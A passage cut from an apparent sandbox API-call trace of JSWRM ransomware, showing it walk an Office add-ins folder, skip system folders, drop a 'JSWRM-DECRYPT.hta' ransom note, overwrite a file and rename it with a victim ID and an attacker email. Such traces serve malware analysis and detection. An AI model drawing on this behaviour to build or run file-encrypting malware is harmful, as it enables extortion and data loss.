lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCWIZ.DLL", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACCWIZ.DLL", lpUsedDefaultChar=0x0) returned 10 [0122.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0122.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0122.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0122.961] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xce758538, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe107a061, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe15188c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x91aa0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ACEDAO.DLL", cAlternateFileName="")) returned 1 [0122.961] lstrcmpiW (lpString1="ACEDAO.DLL", lpString2=".") returned 1 [0122.961] lstrcmpiW (lpString1="ACEDAO.DLL", lpString2="..") returned 1 [0122.961] lstrcmpiW (lpString1="ACEDAO.DLL", lpString2="...") returned 1 [0122.961] lstrcmpiW (lpString1="ACEDAO.DLL", lpString2="windows") returned -1 [0122.961] lstrcmpiW (lpString1="ACEDAO.DLL", lpString2="recovery") returned -1 [0122.961] lstrcmpiW (lpString1="ACEDAO.DLL", lpString2="perflogs") returned -1 [0122.961] lstrcmpiW (lpString1="ACEDAO.DLL", lpString2="documents and settings") returned -1 [0122.961] lstrcmpiW (lpString1="ACEDAO.DLL", lpString2="$RECYCLE.BIN") returned 1 [0122.961] lstrcmpiW (lpString1="ACEDAO.DLL", lpString2="system volume information") returned -1 [0122.961] lstrcmpiW (lpString1="ACEDAO.DLL", lpString2="msocache") returned -1 [0122.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0122.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACEDAO.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACEDAO.DLL", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEDAO.DLL", lpUsedDefaultChar=0x0) returned 10 [0122.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0122.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0122.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACEDAO.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACEDAO.DLL", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACEDAO.DLL", lpUsedDefaultChar=0x0) returned 10 [0122.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0122.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0122.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0122.961] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7c5a96a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133819a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133819a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ADDINS", cAlternateFileName="")) returned 1 [0122.961] lstrcmpiW (lpString1="ADDINS", lpString2=".") returned 1 [0122.961] lstrcmpiW (lpString1="ADDINS", lpString2="..") returned 1 [0122.961] lstrcmpiW (lpString1="ADDINS", lpString2="...") returned 1 [0122.961] lstrcmpiW (lpString1="ADDINS", lpString2="windows") returned -1 [0122.961] lstrcmpiW (lpString1="ADDINS", lpString2="recovery") returned -1 [0122.962] lstrcmpiW (lpString1="ADDINS", lpString2="perflogs") returned -1 [0122.962] lstrcmpiW (lpString1="ADDINS", lpString2="documents and settings") returned -1 [0122.962] lstrcmpiW (lpString1="ADDINS", lpString2="$RECYCLE.BIN") returned 1 [0122.962] lstrcmpiW (lpString1="ADDINS", lpString2="system volume information") returned -1 [0122.962] lstrcmpiW (lpString1="ADDINS", lpString2="msocache") returned -1 [0122.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0122.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0122.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0122.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0122.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b6a0 [0122.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0122.962] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\jswrm-decrypt.hta")) returned 0xffffffff [0122.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0122.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0122.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0122.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0122.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24e1d8 [0122.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0122.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224cc8 [0122.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b6a0 [0122.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224cc8 | out: hHeap=0x1e0000) returned 1 [0122.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0122.963] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.963] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0122.964] CloseHandle (hObject=0x45c) returned 1 [0122.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0122.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0122.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0122.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0122.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0122.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0122.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24bc18 [0122.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0122.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\jswrm-decrypt.hta")) returned 0x20 [0122.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0122.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0122.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0122.966] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7c5a96a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133819a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3ff3834d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName=".", cAlternateFileName="")) returned 0x232040 [0122.966] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0122.966] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7c5a96a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133819a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3ff3834d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="..", cAlternateFileName="")) returned 1 [0122.966] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0122.966] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0122.966] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6a7cf13, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a7cf13, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d6d0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ACCOLK.DLL", cAlternateFileName="")) returned 1 [0122.966] lstrcmpiW (lpString1="ACCOLK.DLL", lpString2=".") returned 1 [0122.967] lstrcmpiW (lpString1="ACCOLK.DLL", lpString2="..") returned 1 [0122.967] lstrcmpiW (lpString1="ACCOLK.DLL", lpString2="...") returned 1 [0122.967] lstrcmpiW (lpString1="ACCOLK.DLL", lpString2="windows") returned -1 [0122.967] lstrcmpiW (lpString1="ACCOLK.DLL", lpString2="recovery") returned -1 [0122.967] lstrcmpiW (lpString1="ACCOLK.DLL", lpString2="perflogs") returned -1 [0122.967] lstrcmpiW (lpString1="ACCOLK.DLL", lpString2="documents and settings") returned -1 [0122.967] lstrcmpiW (lpString1="ACCOLK.DLL", lpString2="$RECYCLE.BIN") returned 1 [0122.967] lstrcmpiW (lpString1="ACCOLK.DLL", lpString2="system volume information") returned -1 [0122.967] lstrcmpiW (lpString1="ACCOLK.DLL", lpString2="msocache") returned -1 [0122.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0122.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCOLK.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCOLK.DLL", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACCOLK.DLL", lpUsedDefaultChar=0x0) returned 10 [0122.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0122.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0122.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCOLK.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCOLK.DLL", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACCOLK.DLL", lpUsedDefaultChar=0x0) returned 10 [0122.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0122.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0122.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0122.967] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc7c5a96a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc7c5a96a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc7c80c48, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x23460, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ColleagueImport.dll", cAlternateFileName="COLLEA~1.DLL")) returned 1 [0122.967] lstrcmpiW (lpString1="ColleagueImport.dll", lpString2=".") returned 1 [0122.967] lstrcmpiW (lpString1="ColleagueImport.dll", lpString2="..") returned 1 [0122.967] lstrcmpiW (lpString1="ColleagueImport.dll", lpString2="...") returned 1 [0122.967] lstrcmpiW (lpString1="ColleagueImport.dll", lpString2="windows") returned -1 [0122.967] lstrcmpiW (lpString1="ColleagueImport.dll", lpString2="recovery") returned -1 [0122.967] lstrcmpiW (lpString1="ColleagueImport.dll", lpString2="perflogs") returned -1 [0122.967] lstrcmpiW (lpString1="ColleagueImport.dll", lpString2="documents and settings") returned -1 [0122.967] lstrcmpiW (lpString1="ColleagueImport.dll", lpString2="$RECYCLE.BIN") returned 1 [0122.967] lstrcmpiW (lpString1="ColleagueImport.dll", lpString2="system volume information") returned -1 [0122.967] lstrcmpiW (lpString1="ColleagueImport.dll", lpString2="msocache") returned -1 [0122.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ColleagueImport.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0122.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0122.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ColleagueImport.dll", cchWideChar=19, lpMultiByteStr=0x2412b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ColleagueImport.dll", lpUsedDefaultChar=0x0) returned 19 [0122.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0122.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ColleagueImport.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0122.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0122.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ColleagueImport.dll", cchWideChar=19, lpMultiByteStr=0x241128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ColleagueImport.dll", lpUsedDefaultChar=0x0) returned 19 [0122.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0122.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0122.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0122.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0122.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0122.968] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xafa146a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xafa146a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xafa146a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x33e, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="FAXEXT.ECF", cAlternateFileName="")) returned 1 [0122.968] lstrcmpiW (lpString1="FAXEXT.ECF", lpString2=".") returned 1 [0122.968] lstrcmpiW (lpString1="FAXEXT.ECF", lpString2="..") returned 1 [0122.968] lstrcmpiW (lpString1="FAXEXT.ECF", lpString2="...") returned 1 [0122.968] lstrcmpiW (lpString1="FAXEXT.ECF", lpString2="windows") returned -1 [0122.968] lstrcmpiW (lpString1="FAXEXT.ECF", lpString2="recovery") returned -1 [0122.968] lstrcmpiW (lpString1="FAXEXT.ECF", lpString2="perflogs") returned -1 [0122.968] lstrcmpiW (lpString1="FAXEXT.ECF", lpString2="documents and settings") returned 1 [0122.968] lstrcmpiW (lpString1="FAXEXT.ECF", lpString2="$RECYCLE.BIN") returned 1 [0122.968] lstrcmpiW (lpString1="FAXEXT.ECF", lpString2="system volume information") returned -1 [0122.968] lstrcmpiW (lpString1="FAXEXT.ECF", lpString2="msocache") returned -1 [0122.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0122.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FAXEXT.ECF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FAXEXT.ECF", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FAXEXT.ECF", lpUsedDefaultChar=0x0) returned 10 [0122.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0122.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0122.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FAXEXT.ECF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FAXEXT.ECF", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FAXEXT.ECF", lpUsedDefaultChar=0x0) returned 10 [0122.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0122.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0122.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0122.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0122.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\FAXEXT.ECF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\faxext.ecf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.970] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=830) returned 1 [0122.970] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x330) returned 0x20b1f8 [0122.970] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x330, lpOverlapped=0x0) returned 1 [0122.972] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.972] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x330, lpOverlapped=0x0) returned 1 [0122.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0122.972] CloseHandle (hObject=0x238) returned 1 [0122.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0122.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0122.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0122.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0122.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0122.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.972] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\FAXEXT.ECF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\faxext.ecf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\FAXEXT.ECF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\faxext.ecf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0122.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0122.974] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, 